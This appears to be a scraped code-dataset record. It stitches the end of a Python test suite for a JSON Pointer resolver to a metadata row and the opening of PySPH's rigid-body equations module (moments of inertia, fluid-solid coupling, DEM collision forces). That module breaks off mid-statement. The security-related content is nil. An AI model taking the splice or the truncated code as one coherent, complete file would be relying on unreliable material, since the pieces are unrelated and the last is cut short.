def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| true | true |
f72ee435673a5217151a45861e9d332977bb5797 | 26,728 | py | Python | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:42:56.000Z | 2019-03-11T12:42:56.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2018-11-17T15:39:11.000Z | 2018-11-17T15:39:11.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Rigid body related equations.
"""
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
    """Return the 3x3 skew-symmetric (cross-product) matrix of *vec*."""
    import sympy as S
    a, b, c = vec[0], vec[1], vec[2]
    return S.Matrix([
        [0, -c, b],
        [c, 0, -a],
        [-b, a, 0],
    ])
def get_alpha_dot():
    """Use sympy to perform most of the math and use the resulting formulae
    to calculate:

            inv(I) (\tau - w x (I w))

    Developer utility: prints the common-subexpression-eliminated formulae
    (tmp0..tmpN and omega_dot[0..2]) that were transcribed into
    ``RigidBodyMoments.reduce`` (see the "sympy code above" comment there).
    Requires sympy; not used at simulation run time.
    """
    import sympy as S
    # Symbolic inertia tensor components, torque and angular velocity.
    ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
    tx, ty, tz = S.symbols("tx, ty, tz")
    wx, wy, wz = S.symbols('wx, wy, wz')
    tau = S.Matrix([tx, ty, tz])
    I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
    w = S.Matrix([wx, wy, wz])
    Iinv = I.inv()
    Iinv.simplify()
    # inv(I) (\tau - w x (Iw))
    res = Iinv*(tau - w.cross(I*w))
    res.simplify()
    # Now do some awesome sympy magic: share common subexpressions so the
    # generated code evaluates each product only once.
    syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
    for lhs, rhs in syms:
        print("%s = %s" % (lhs, rhs))
    for i in range(3):
        print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
    """Use sympy to perform some simple math.

        R x F
        C_m x F
        w x r

    Developer utility printing the expanded cross products used when
    transcribing the torque/velocity expressions into the equations below.
    Requires sympy; not used at simulation run time.
    """
    import sympy as S
    x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
    R = S.Matrix([x, y, z])
    F = S.Matrix([fx, fy, fz])
    print("Torque:", R.cross(F))
    cx, cy, cz = S.symbols('cx, cy, cz')
    d = S.Matrix([cx, cy, cz])
    print("c_m x f = ", d.cross(F))
    wx, wy, wz = S.symbols('wx, wy, wz')
    rx, ry, rz = S.symbols('rx, ry, rz')
    w = S.Matrix([wx, wy, wz])
    r = S.Matrix([rx, ry, rz])
    print("w x r = %s" % w.cross(r))
# This is defined to silence editor warnings for the use of declare.
def declare(*args):
    """No-op stand-in for PySPH's ``declare`` type annotation helper.

    At plain Python run time it only needs to exist and return None;
    presumably the transpiler gives the call its real meaning — confirm
    against the PySPH sources.
    """
    return None
class RigidBodyMoments(Equation):
    """Reduction computing, per rigid body: total mass, center of mass,
    inertia tensor, net force/torque about the CM, CM acceleration and
    angular acceleration (omega_dot).  Results are written into the
    destination particle array's per-body properties.
    """

    def reduce(self, dst, t, dt):
        # FIXME: this will be slow in opencl
        nbody = declare('int')
        i = declare('int')
        base_mi = declare('int')
        base = declare('int')
        nbody = dst.num_body[0]
        if dst.gpu:
            dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')

        d_mi = declare('object')
        m = declare('object')
        x = declare('object')
        y = declare('object')
        z = declare('object')
        fx = declare('object')
        fy = declare('object')
        fz = declare('object')
        d_mi = dst.mi
        cond = declare('object')
        # Pass 1: accumulate 16 raw sums per body into the mi scratch array
        # (mass moments, second moments, force and torque about the origin).
        for i in range(nbody):
            cond = dst.body_id == i
            base = i*16
            m = dst.m[cond]
            x = dst.x[cond]
            y = dst.y[cond]
            z = dst.z[cond]
            # Find the total_mass, center of mass and second moments.
            d_mi[base + 0] = numpy.sum(m)
            d_mi[base + 1] = numpy.sum(m*x)
            d_mi[base + 2] = numpy.sum(m*y)
            d_mi[base + 3] = numpy.sum(m*z)
            # Only do the lower triangle of values moments of inertia.
            d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
            d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
            d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
            d_mi[base + 7] = -numpy.sum(m*x*y)
            d_mi[base + 8] = -numpy.sum(m*x*z)
            d_mi[base + 9] = -numpy.sum(m*y*z)

            # the total force and torque
            fx = dst.fx[cond]
            fy = dst.fy[cond]
            fz = dst.fz[cond]
            d_mi[base + 10] = numpy.sum(fx)
            d_mi[base + 11] = numpy.sum(fy)
            d_mi[base + 12] = numpy.sum(fz)

            # Calculate the torque and reduce it.
            d_mi[base + 13] = numpy.sum(y*fz - z*fy)
            d_mi[base + 14] = numpy.sum(z*fx - x*fz)
            d_mi[base + 15] = numpy.sum(x*fy - y*fx)

        # Reduce the temporary mi values in parallel across processors.
        d_mi[:] = parallel_reduce_array(dst.mi)

        # Pass 2: derive the per-body physical quantities from the sums.
        # Set the reduced values.
        for i in range(nbody):
            base_mi = i*16
            base = i*3
            m = d_mi[base_mi + 0]
            dst.total_mass[i] = m
            cx = d_mi[base_mi + 1]/m
            cy = d_mi[base_mi + 2]/m
            cz = d_mi[base_mi + 3]/m
            dst.cm[base + 0] = cx
            dst.cm[base + 1] = cy
            dst.cm[base + 2] = cz

            # The actual moment of inertia about center of mass from parallel
            # axes theorem.
            ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
            iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
            izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
            ixy = d_mi[base_mi + 7] + cx*cy*m
            ixz = d_mi[base_mi + 8] + cx*cz*m
            iyz = d_mi[base_mi + 9] + cy*cz*m
            # Store the full (symmetric) inertia tensor back into mi.
            d_mi[base_mi + 0] = ixx
            d_mi[base_mi + 1] = ixy
            d_mi[base_mi + 2] = ixz
            d_mi[base_mi + 3] = ixy
            d_mi[base_mi + 4] = iyy
            d_mi[base_mi + 5] = iyz
            d_mi[base_mi + 6] = ixz
            d_mi[base_mi + 7] = iyz
            d_mi[base_mi + 8] = izz
            fx = d_mi[base_mi + 10]
            fy = d_mi[base_mi + 11]
            fz = d_mi[base_mi + 12]
            dst.force[base + 0] = fx
            dst.force[base + 1] = fy
            dst.force[base + 2] = fz
            # Acceleration of CM.
            dst.ac[base + 0] = fx/m
            dst.ac[base + 1] = fy/m
            dst.ac[base + 2] = fz/m

            # Find torque about the Center of Mass and not origin.
            tx = d_mi[base_mi + 13]
            ty = d_mi[base_mi + 14]
            tz = d_mi[base_mi + 15]
            tx -= cy*fz - cz*fy
            ty -= -cx*fz + cz*fx
            tz -= cx*fy - cy*fx
            dst.torque[base + 0] = tx
            dst.torque[base + 1] = ty
            dst.torque[base + 2] = tz
            wx = dst.omega[base + 0]
            wy = dst.omega[base + 1]
            wz = dst.omega[base + 2]
            # Find omega_dot from: omega_dot = inv(I) (\tau - w x (Iw))
            # This was done using the sympy code above (get_alpha_dot); the
            # tmp* values are sympy's common subexpressions.
            tmp0 = iyz**2
            tmp1 = ixy**2
            tmp2 = ixz**2
            tmp3 = ixx*iyy
            tmp4 = ixy*ixz
            tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
            tmp6 = ixy*izz - ixz*iyz
            tmp7 = ixz*wx + iyz*wy + izz*wz
            tmp8 = ixx*wx + ixy*wy + ixz*wz
            tmp9 = tmp7*wx - tmp8*wz + ty
            tmp10 = ixy*iyz - ixz*iyy
            tmp11 = ixy*wx + iyy*wy + iyz*wz
            tmp12 = -tmp11*wx + tmp8*wy + tz
            tmp13 = tmp11*wz - tmp7*wy + tx
            tmp14 = ixx*iyz - tmp4
            dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
                                            tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
            dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
                                            tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
            dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
                                            tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
        if dst.gpu:
            dst.gpu.push(
                'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
                'omega_dot'
            )
class RigidBodyMotion(Equation):
    """Set each particle's velocity from its body's rigid motion:
    v = v_cm + omega x r, where r is the offset from the body's CM.
    """

    def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
                   d_cm, d_vc, d_ac, d_omega, d_body_id):
        base = declare('int')
        base = d_body_id[d_idx]*3
        omx = d_omega[base + 0]
        omy = d_omega[base + 1]
        omz = d_omega[base + 2]
        # Offset of this particle from its body's center of mass.
        dx = d_x[d_idx] - d_cm[base + 0]
        dy = d_y[d_idx] - d_cm[base + 1]
        dz = d_z[d_idx] - d_cm[base + 2]
        # v = v_c + omega cross r (componentwise).
        d_u[d_idx] = d_vc[base + 0] + omy*dz - omz*dy
        d_v[d_idx] = d_vc[base + 1] + omz*dx - omx*dz
        d_w[d_idx] = d_vc[base + 2] + omx*dy - omy*dx
class BodyForce(Equation):
    """Set a constant per-particle body force, f = m*g (e.g. gravity).

    Note that ``initialize`` *overwrites* d_fx/d_fy/d_fz, so this equation
    must run before any equation that accumulates into the force arrays.
    """
    def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
        # gx, gy, gz: components of the body acceleration (default 0).
        self.gx = gx
        self.gy = gy
        self.gz = gz
        super(BodyForce, self).__init__(dest, sources)
    def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
        # f = m*g; runs once per particle before the pair loops.
        d_fx[d_idx] = d_m[d_idx]*self.gx
        d_fy[d_idx] = d_m[d_idx]*self.gy
        d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
    r"""Add the density contribution of boundary or rigid-body particles
    to a fluid particle:

    :math:`\rho_a = \sum_b {\rho}_{fluid} V_b W_{ab}`
    """
    def __init__(self, dest, sources, fluid_rho=1000.0):
        # fluid_rho: rest density of the fluid phase.
        self.fluid_rho = fluid_rho
        super(SummationDensityBoundary, self).__init__(dest, sources)
    def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
        # Each boundary particle contributes rho_fluid * V_b * W_ab.
        d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
    """Compute the number density V_a = sum_b W_ab.

    Its inverse approximates the particle volume; other equations here
    divide by ``V`` to obtain effective masses/volumes.
    """
    def initialize(self, d_idx, d_V):
        d_V[d_idx] = 0.0
    def loop(self, d_idx, d_V, WIJ):
        d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
    """Density of a particle from neighbouring rigid-body particles:
    rho_a = sum_b (rho0 / V_b) W_ab, where V is the number density
    computed by ``NumberDensity`` so rho0/V_b acts as an effective mass.
    """
    def __init__(self, dest, sources, rho0):
        # rho0: rest density of the rigid-body material.
        self.rho0 = rho0
        super(SummationDensityRigidBody, self).__init__(dest, sources)
    def initialize(self, d_idx, d_rho):
        d_rho[d_idx] = 0.0
    def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
        # rho0/s_V is the effective mass of source particle s.
        d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
    """The viscous acceleration on the fluid/solid due to a boundary.

    Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558

    Use this with the fluid as a destination and body as source.
    """
    def __init__(self, dest, sources, rho0, nu):
        # nu: kinematic viscosity; rho0: rest density of the fluid.
        self.nu = nu
        self.rho0 = rho0
        super(ViscosityRigidBody, self).__init__(dest, sources)
    def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
             s_idx, s_V, s_fx, s_fy, s_fz,
             EPS, VIJ, XIJ, R2IJ, DWIJ):
        # Boundary weighting factor built from the boundary particle's
        # number density and the fluid density.
        phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
        # min(.., 0): only approaching pairs (v.x < 0) feel the force.
        vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
        # EPS regularizes the denominator for very close pairs.
        fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
        ax = fac*DWIJ[0]
        ay = fac*DWIJ[1]
        az = fac*DWIJ[2]
        # Accelerate the fluid particle ...
        d_au[d_idx] += ax
        d_av[d_idx] += ay
        d_aw[d_idx] += az
        # ... and accumulate the equal-and-opposite force on the body.
        s_fx[s_idx] += -d_m[d_idx]*ax
        s_fy[s_idx] += -d_m[d_idx]*ay
        s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
    """The pressure acceleration on the fluid/solid due to a boundary.

    Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558

    Use this with the fluid as a destination and body as source.
    """
    def __init__(self, dest, sources, rho0):
        # rho0: rest density of the fluid.
        self.rho0 = rho0
        super(PressureRigidBody, self).__init__(dest, sources)
    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
        rho1 = 1.0/d_rho[d_idx]
        # -p/rho^2 scaled by the boundary particle's effective mass rho0/V.
        fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
        ax = fac*DWIJ[0]
        ay = fac*DWIJ[1]
        az = fac*DWIJ[2]
        # Accelerate the fluid particle ...
        d_au[d_idx] += ax
        d_av[d_idx] += ay
        d_aw[d_idx] += az
        # ... and accumulate the reaction force on the body particle.
        s_fx[s_idx] += -d_m[d_idx]*ax
        s_fy[s_idx] += -d_m[d_idx]*ay
        s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
    """Force between a solid sphere and a SPH fluid particle. This is
    implemented using Akinci's[1] force and additional force from solid
    bodies pressure which is implemented by Liu[2]

    [1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
    URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf

    [2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
    Coupling SPH and DEM
    https://doi.org/10.1155/2017/3174904

    Note: Here forces for both the phases are added at once.
    Please make sure that this force is applied only once
    for both the particle properties.
    """
    def __init__(self, dest, sources, fluid_rho=1000):
        super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
        # fluid_rho: rest density of the fluid phase.
        self.fluid_rho = fluid_rho
    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
        # psi: pseudo-mass of the boundary particle. NOTE(review): this
        # multiplies by s_V, so here s_V presumably holds the particle
        # volume (not the number density used elsewhere) -- confirm.
        psi = s_V[s_idx] * self.fluid_rho
        # Pressure term uses only the fluid side; the factor 2 presumably
        # mirrors the fluid pressure onto the body -- confirm vs Akinci.
        _t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
        # Acceleration of the fluid particle.
        d_au[d_idx] += -psi * _t1 * DWIJ[0]
        d_av[d_idx] += -psi * _t1 * DWIJ[1]
        d_aw[d_idx] += -psi * _t1 * DWIJ[2]
        # Equal-and-opposite force accumulated on the solid particle.
        s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
        s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
        s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
    """Force between a solid sphere and a SPH fluid particle. This is
    implemented using Akinci's[1] force and additional force from solid
    bodies pressure which is implemented by Liu[2]

    [1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
    URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf

    [2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
    Coupling SPH and DEM
    https://doi.org/10.1155/2017/3174904

    Note: Here forces for both the phases are added at once.
    Please make sure that this force is applied only once
    for both the particle properties.
    """
    def __init__(self, dest, sources):
        super(LiuFluidForce, self).__init__(dest, sources)
    def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
             s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
        # Symmetric SPH pressure term: p_j/rho_j^2 + p_i/rho_i^2.
        _t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
        # Acceleration of the fluid particle.
        d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
        d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
        d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
        # Equal-and-opposite force accumulated on the solid particle.
        s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
        s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
        s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
    """This is inspired from
    http://http.developer.nvidia.com/GPUGems3/gpugems3_ch29.html
    and
    BK Mishra's article on DEM
    http://dx.doi.org/10.1016/S0301-7516(03)00032-2
    A review of computer simulation of tumbling mills by the discrete element
    method: Part I - contact mechanics
    """
    def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
        """Note that d is a factor multiplied with the "h" of the particle.

        k: spring constant, eta: normal damping, kt: shear/tangential
        damping coefficient.
        """
        self.k = k
        self.d = d
        self.eta = eta
        self.kt = kt
        super(RigidBodyForceGPUGems, self).__init__(dest, sources)
    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
             RIJ, R2IJ, VIJ):
        vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
        if RIJ > 1e-9:
            vijdotrij_r2ij = vijdotrij/R2IJ
            # Unit normal from j to i.
            nij_x = XIJ[0]/RIJ
            nij_y = XIJ[1]/RIJ
            nij_z = XIJ[2]/RIJ
        else:
            # Coincident particles: no well-defined normal direction.
            vijdotrij_r2ij = 0.0
            nij_x = 0.0
            nij_y = 0.0
            nij_z = 0.0
        # Tangential component of the relative velocity.
        vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
        vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
        vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
        # Interaction distance as a multiple of the smoothing length.
        d = self.d*d_h[d_idx]
        # Linear repulsive spring, active only when the pair overlaps.
        fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
        # spring + normal damping (eta) + tangential/shear damping (kt).
        d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
        d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
        d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
    """Force between two spheres is implemented using DEM contact force law.
    Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
    information.
    Open-source MFIX-DEM software for gas–solids flows:
    Part I—Verification studies .
    """
    def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
        """Initialise the required coefficients for force calculation.
        Keyword arguments:
        kn -- Normal spring stiffness (default 1e3)
        mu -- friction coefficient (default 0.5)
        en -- coefficient of restitution (0.8)
        Given these coefficients, tangential spring stiffness, normal and
        tangential damping coefficient are calculated by default.
        """
        self.kn = kn
        # Standard DEM ratio for the tangential stiffness: kt = (2/7) kn.
        self.kt = 2. / 7. * kn
        # Effective mass used in the damping coefficient; presumably a
        # representative particle (r ~ 0.5 mm, density 2120 kg/m^3) --
        # TODO confirm against the intended particle properties.
        m_eff = np.pi * 0.5**2 * 1e-6 * 2120
        # Normal damping chosen so a binary collision has restitution `en`.
        self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
            np.sqrt(np.pi**2 + np.log(en)**2))
        self.gamma_t = 0.5 * self.gamma_n
        self.mu = mu
        super(RigidBodyCollision, self).__init__(dest, sources)
    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
             d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
             d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
             R2IJ, VIJ):
        # Geometric overlap of the two spheres (<= 0 when not touching).
        overlap = 0
        if RIJ > 1e-9:
            overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
        if overlap > 0:
            # normal vector passing from particle i to j
            nij_x = -XIJ[0] / RIJ
            nij_y = -XIJ[1] / RIJ
            nij_z = -XIJ[2] / RIJ
            # overlap speed: a scalar
            vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
            # normal velocity
            vijn_x = vijdotnij * nij_x
            vijn_y = vijdotnij * nij_y
            vijn_z = vijdotnij * nij_z
            # normal force with conservative and dissipation part
            fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
            fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
            fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
            # ----------------------Tangential force---------------------- #
            # tangential velocity (relative velocity minus normal part)
            d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
            d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
            d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
            dtvx = d_tang_velocity_x[d_idx]
            dtvy = d_tang_velocity_y[d_idx]
            dtvz = d_tang_velocity_z[d_idx]
            _tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
            # tangential unit vector (zero when no tangential motion)
            tij_x = 0
            tij_y = 0
            tij_z = 0
            if _tang > 0:
                tij_x = d_tang_velocity_x[d_idx] / _tang
                tij_y = d_tang_velocity_y[d_idx] / _tang
                tij_z = d_tang_velocity_z[d_idx] / _tang
            # damping force or dissipation
            ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
            ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
            ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
            # tangential spring force from the accumulated displacement
            ft_x_s = -self.kt * d_tang_disp_x[d_idx]
            ft_y_s = -self.kt * d_tang_disp_y[d_idx]
            ft_z_s = -self.kt * d_tang_disp_z[d_idx]
            ft_x = ft_x_d + ft_x_s
            ft_y = ft_y_d + ft_y_s
            ft_z = ft_z_d + ft_z_s
            # coulomb law: cap the tangential force at mu * |fn|
            ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
            fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
            _fnij = self.mu * fnij
            if _fnij < ftij:
                ft_x = -_fnij * tij_x
                ft_y = -_fnij * tij_y
                ft_z = -_fnij * tij_z
            d_fx[d_idx] += fn_x + ft_x
            d_fy[d_idx] += fn_y + ft_y
            d_fz[d_idx] += fn_z + ft_z
        else:
            # No contact: reset the tangential history for this particle.
            d_tang_velocity_x[d_idx] = 0
            d_tang_velocity_y[d_idx] = 0
            d_tang_velocity_z[d_idx] = 0
            d_tang_disp_x[d_idx] = 0
            d_tang_disp_y[d_idx] = 0
            d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
    """Force between sphere and a wall is implemented using
    DEM contact force law.
    Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
    information.
    Open-source MFIX-DEM software for gas–solids flows:
    Part I—Verification studies .
    """
    def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
        """Initialise the required coefficients for force calculation.
        Keyword arguments:
        kn -- Normal spring stiffness (default 1e3)
        mu -- friction coefficient (default 0.5)
        en -- coefficient of restitution (0.8)
        Given these coefficients, tangential spring stiffness, normal and
        tangential damping coefficient are calculated by default.
        """
        self.kn = kn
        # Standard DEM ratio for the tangential stiffness: kt = (2/7) kn.
        self.kt = 2. / 7. * kn
        # Effective mass used in the damping coefficient; presumably a
        # representative particle (r ~ 0.5 mm, density 2120 kg/m^3) --
        # TODO confirm against the intended particle properties.
        m_eff = np.pi * 0.5**2 * 1e-6 * 2120
        # Normal damping chosen so a binary collision has restitution `en`.
        # (A leftover debug print of gamma_n was removed here.)
        self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
            np.sqrt(np.pi**2 + np.log(en)**2))
        self.gamma_t = 0.5 * self.gamma_n
        self.mu = mu
        super(RigidBodyWallCollision, self).__init__(dest, sources)
    def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
             d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
             d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
             R2IJ, VIJ, s_nx, s_ny, s_nz):
        # check overlap amount: penetration depth along the wall normal
        overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
                                    s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
        if overlap > 0:
            # basic variables: normal vector (pointing into the wall)
            nij_x = -s_nx[s_idx]
            nij_y = -s_ny[s_idx]
            nij_z = -s_nz[s_idx]
            # overlap speed: a scalar
            vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
            # normal velocity
            vijn_x = vijdotnij * nij_x
            vijn_y = vijdotnij * nij_y
            vijn_z = vijdotnij * nij_z
            # normal force with conservative and dissipation part
            fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
            fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
            fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
            # ----------------------Tangential force---------------------- #
            # tangential velocity (relative velocity minus normal part)
            d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
            d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
            d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
            _tang = (
